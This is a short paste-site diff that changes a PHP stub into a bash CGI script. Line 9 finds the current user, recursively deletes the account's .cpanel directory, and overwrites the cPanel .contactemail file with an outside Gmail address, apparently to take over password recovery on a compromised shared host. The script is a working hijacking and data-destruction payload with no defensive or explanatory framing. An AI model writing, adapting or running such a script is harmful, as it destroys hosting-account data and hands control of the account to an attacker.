SHOW:
|
|
- or go back to the newest paste.
1 | - | <?php |
1 | + | #!/bin/bash |
2 | ||
3 | - | ?> |
3 | + | |
4 | echo "Content-type: text/html"; | |
5 | echo ''; | |
6 | ||
7 | echo "<html> <center> <font color=red>" | |
8 | ||
9 | user=$(whoami) ; rm -rf /home/$user/.cpanel/ ; cd /home/$user/ ; rm .contactemail ; echo "dexterkh1212x@gmail.com" >> .contactemail ; cat .contactemail ; echo $user | |
10 | echo "</font><center></html>"; |